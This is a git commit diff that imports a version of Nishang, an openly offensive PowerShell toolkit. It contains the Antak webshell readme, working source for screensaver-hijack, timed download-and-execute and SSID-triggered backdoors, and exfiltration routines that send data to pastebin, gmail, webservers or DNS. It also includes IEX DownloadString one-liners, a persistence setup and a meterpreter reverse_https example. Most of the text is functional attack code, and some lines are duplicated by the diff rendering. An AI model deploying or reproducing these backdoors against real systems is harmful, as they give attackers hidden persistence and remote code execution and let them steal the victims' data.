Commit 51f02a27 authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 0.5.0

parent d0cf1ec3
# Auto detect text files and perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
*.sln merge=union
*.csproj merge=union
*.vbproj merge=union
*.fsproj merge=union
*.dbproj merge=union
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain
#################
## Eclipse
#################
*.pydevproject
.project
.metadata
bin/
tmp/
*.tmp
*.bak
*.swp
*~.nib
local.properties
.classpath
.settings/
.loadpath
# External tool builders
.externalToolBuilders/
# Locally stored "Eclipse launch configurations"
*.launch
# CDT-specific
.cproject
# PDT-specific
.buildpath
#################
## Visual Studio
#################
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
#############
## Windows detritus
#############
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store
#############
## Python
#############
*.py[co]
# Packages
*.egg
*.egg-info
dist/
build/
eggs/
parts/
var/
sdist/
develop-eggs/
.installed.cfg
# Installer logs
pip-log.txt
# Unit test / coverage reports
.coverage
.tox
#Translations
*.mo
#Mr Developer
.mr.developer.cfg
#TODO
TODO.txt
Antak is a webshell written in C#.Net which utilizes powershell.
Antak is a part of Nishang and updates could be found here:
Antak is a webshell written in ASP.Net which utilizes PowerShell.
Antak is a part of Nishang and updates can be found here:
https://github.com/samratashok/nishang
Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
Use this shell as a normal PowerShell console. Each command is executed in a new process; keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
Executing PowerShell scripts on the target:
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
1. Paste the script in command textbox and click 'Encode and Execute." A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
2. Use PowerShell one-liner (example below) to download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
3. Upload the script to the target and execute it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons:
Files can be uploaded and downloaded using the respective buttons.
Uploading a file:
To upload a file, you must mention the actual path on the server (with write permissions) in the command text box.
(OS temporary directories like C:\Windows\Temp may be writable.)
Then, use the browse and upload buttons to upload file to that path.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Downloading a file:
To download a file, enter the actual path on the server in the command text box.
Then click on Download button.
A detailed blog post on Antak could be found here
A detailed blog post on Antak can be found here:
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
function Add-ScrnSaveBackdoor
{
<#
.SYNOPSIS
Nishang Script which could set Debugger registry keys for a screensaver to remotely execute commands and scripts.
.DESCRIPTION
The script reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
to check for the existing Screensaver. If none exists, one from the default ones which exist in C:\Windows\System32 is used.
A Debugger to the screensaver is created at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\.
It is the value of the "Debugger" to this key where it writes the payload. A screensaver selected from the default ones is added to this payload.
When the payload is executed, the screensaver also runs after it to make it appear legit. Change the contents of the payload URL
to execute different scripts using the same backdoor.
.PARAMETER Payload
Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target.
.PARAMETER Arguments
Arguments to the powershell script to be executed on the target.
.PARAMETER NewScreenSaver
Full path to the screensaver to be used if none is being used. Default is C:\Windows\System32\Ribbons.scr
.EXAMPLE
PS > Add-ScrnSaveBackdoor -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
Use above command to provide your own payload to be executed.
.EXAMPLE
PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/FireBuster.ps1 -Arguments "FireBuster 192.168.254.1 8440-8445"
Use above to execute FireBuster from Nishang for Egress Testing.
.EXAMPLE
PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor "http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
Use above to execute HTTP-Backdoor from Powerpreter
.EXAMPLE
PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/code_exec.ps1
Use above to execute an in-memory meterpreter in PowerShell format generated using msfvenom
(./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell)
.LINK
http://www.labofapenetrationtester.com/2015/02/using-windows-screensaver-as-backdoor.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$PayloadURL,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$Arguments,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$NewScreenSaver = "C:\Windows\System32\Ribbons.scr"
)
#Check if ScreenSaver is enabled
#If no enable it, if yes, get its value
if ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("SCRNSAVE.EXE") -eq $null)
{
New-ItemProperty "HKCU:\Control Panel\Desktop\" -Name SCRNSAVE.EXE -Value $NewScreenSaver -PropertyType String
$ScreenSaverName = ($NewScreenSaver -split '\\')[-1]
}
else
{
$ScreenSaverName = ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("SCRNSAVE.EXE") -split '\\')[-1]
}
#Set ScreenSaveTimeOut which is necessary to enable screensaver.
if ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("ScreenSaveTimeOut") -eq $null)
{
New-ItemProperty "HKCU:\Control Panel\Desktop\" -Name ScreenSaveTimeOut -Value 60 -PropertyType String
}
else
{
Set-ItemProperty "HKCU:\Control Panel\Desktop\" -Name ScreenSaveTimeOut -Value 60
}
#Get a list of default screensavers and select one at random
$ListScrn = Get-ChildItem C:\Windows\System32\*.scr | Where-Object {$_.Name -ne $ScreenSaverName}
$PathToScreensaver = Get-Random $ListScrn
#Add a default screensaver to payload so that it runs after our payload.
if(!$Payload)
{
$RegValue = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments" + ";" + $PathToScreensaver + " /s"
}
elseif ($Payload)
{
$RegValue = $Payload + ";" + $Arguments + ";" + $PathToScreensaver + " /s"
}
#Set Debugger for the ScreenSaver executable
if (Test-Path -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName")
{
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
Write-Output "Payload added as Debugger for $ScreenSaverName"
}
else
{
New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName"
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
Write-Output "Payload added as Debugger for $ScreenSaverName"
}
}
\ No newline at end of file
This diff is collapsed.
function Execute-OnTime
{
<#
.SYNOPSIS
Nishang Payload which waits till given time to execute a script.
.DESCRIPTION
This payload waits till the given time (on the victim)
and then downloads a PowerShell script and executes it.
This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER PayloadURL
The URL from where the file would be downloaded.
.PARAMETER Arguments
Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.
.PARAMETER time
The Time when the payload will be executed (in 24 hour format e.g. 23:21).
......@@ -40,24 +47,27 @@ Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
The URL of the webserver where POST requests would be sent. The Webserver must beb able to log the POST requests.
The encoded values from the webserver could be decoded bby using Invoke-Decode from Nishang.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
The DomainName, whose subdomains would be used for sending TXT queries to. The DNS Server must log the TXT queries.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
Authoritative Name Server for the domain specified in DomainName. Using it may increase chances of detection.
Usually, you should let the Name Server of target to resolve things for you.
.EXAMPLE
PS > Execute-OnTime http://example.com/script.ps1 hh:mm http://pastebin.com/raw.php?i=Zhyf8rwh stoppayload
PS > Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload
Use above when using the payload from non-interactive shells.
EXAMPLE
PS > Execute-OnTime http://pastebin.com/raw.php?i=Zhyf8rwh hh:mm http://pastebin.com/raw.php?i=jqP2vJ3x stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php>
PS > Execute-OnTime PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above when using the payload from non-interactive shells.
Exfiltrate results to a webserver which logs POST requests.
.EXAMPLE
PS > Execute-OnTime -persist
PS > Execute-OnTime -PayloadURL http://example.com/script.ps1 -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php -persist
Use above for reboot persistence.
......@@ -67,12 +77,6 @@ https://github.com/samratashok/nishang
#>
function Execute-OnTime
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
......@@ -87,58 +91,64 @@ function Execute-OnTime
[String]
$PayloadURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[Parameter(Position = 1, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $False, Parametersetname="noexfil")]
[String]
$time,
$Arguments = "Out-Null",
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
$time,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 4, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 4, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[Parameter(Position = 11, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$body = @'
function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
function Logic-Execute-OnTime ($PayloadURL, $Arguments, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
{
$exec = 0
while($true)
{
$exec = 0
start-sleep -seconds 5
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
......@@ -147,6 +157,11 @@ function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $Exfi
{
$pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
# Check for arguments to the downloaded script.
if ($Arguments -ne "Out-Null")
{
$pastevalue = Invoke-Expression $Arguments
}
$pastevalue
$exec++
if ($exfil -eq $True)
......@@ -193,7 +208,7 @@ function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,
$sw.Close()
# Base64 encode stream
$code = [Convert]::ToBase64String($ms.ToArray())
$code
return $code
}
if ($exfiloption -eq "pastebin")
......@@ -227,7 +242,6 @@ function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
$Data
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
......@@ -255,11 +269,11 @@ function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,
{
$name = "persist.vbs"
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
$options = "Logic-Execute-OnTime $PayloadURL $Arguments $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
$options = "Logic-Execute-OnTime $PayloadURL $Arguments $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
......@@ -291,10 +305,10 @@ function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,
}
else
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
$options = "Logic-Execute-OnTime $PayloadURL $Arguments $time $CheckURL $StopString $dev_key $username $password $keyoutoption $exfil"
if ($exfil -eq $True)
{
$options = "Logic-Execute-OnTime $PayloadURL $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
$options = "Logic-Execute-OnTime $PayloadURL $Arguments $time $CheckURL $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
......

function Gupt-Backdoor
{
<#
.SYNOPSIS
Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names.
.DESCRIPTION
Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of
each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and
exeucted. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and
executed in memory from the URL. See examples for usage.
Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring.
.PARAMETER MagicString
The string which Gupt would compare with the available SSIDs.
.PARAMETER Arguments
Arguments to pass to a downloaded script.
.EXAMPLE
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami".
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". To execute a powershell script on the target, the wireless network name should be
"op3nunJEuug". Here, Gupt will use of characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved
by the Google shortener would be downloaded and executed.
.LINK
http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position=0, Mandatory = $True)]
[String]
$MagicString,
[Parameter(Position=1, Mandatory = $False)]
[String]
$Arguments
)
#Get list of available Wlan networks
while($True)
{
Write-Verbose "Checking wireless networks for instructions."
$networks = Invoke-Expression "netsh wlan show network"
$ssid = $networks | Select-String "SSID"
$NetworkNames = $ssid -replace ".*:" -replace " "
ForEach ($network in $NetworkNames)
{
#Check if the first four characters of our SSID matches the given MagicString
if ($network.Substring(0,4) -match $MagicString.Substring(0,4))
{
Write-Verbose "Found a network with instructions!"
#If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL
if ($network.Substring(4)[0] -eq "u")
{
Write-Verbose "Downloading the attack script and executing it in memory."
$PayloadURL = "http://goo.gl/" + $network.Substring(5)
$webclient = New-Object System.Net.WebClient
Invoke-Expression $webclient.DownloadString($PayloadURL)
if ($Arguments)
{
Invoke-Expression $Arguments
}
Start-Sleep -Seconds 10
}
elseif ($network.Substring(4)[0] -eq "c")
{
$cmd = $network.Substring(5)
if ($cmd -eq "exit")
{
break
}
Write-Verbose "Command `"$cmd`" found. Executing it."
Invoke-Expression $cmd
Start-Sleep -Seconds 10
}
}
}
Start-Sleep -Seconds 5
}
}
\ No newline at end of file
function HTTP-Backdoor
{
<#
.SYNOPSIS
Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script.
......@@ -6,7 +8,8 @@ Nishang Payload which queries a URL for instructions and then downloads and exec
.DESCRIPTION
This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches
the string given in StopString variable. By using the exfile parameter, it would be possible to
the string given in StopString variable.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER CheckURL
The URL which the payload would query for instructions.
......@@ -14,6 +17,9 @@ The URL which the payload would query for instructions.
.PARAMETER PayloadURL
The URL from where the powershell script would be downloaded.
.PARAMETER Arguments
Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.
.PARAMETER MagicString
The string which would act as an instruction to the payload to proceed with download and execute.
......@@ -42,13 +48,15 @@ Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
The URL of the webserver where POST requests would be sent. The Webserver must beb able to log the POST requests.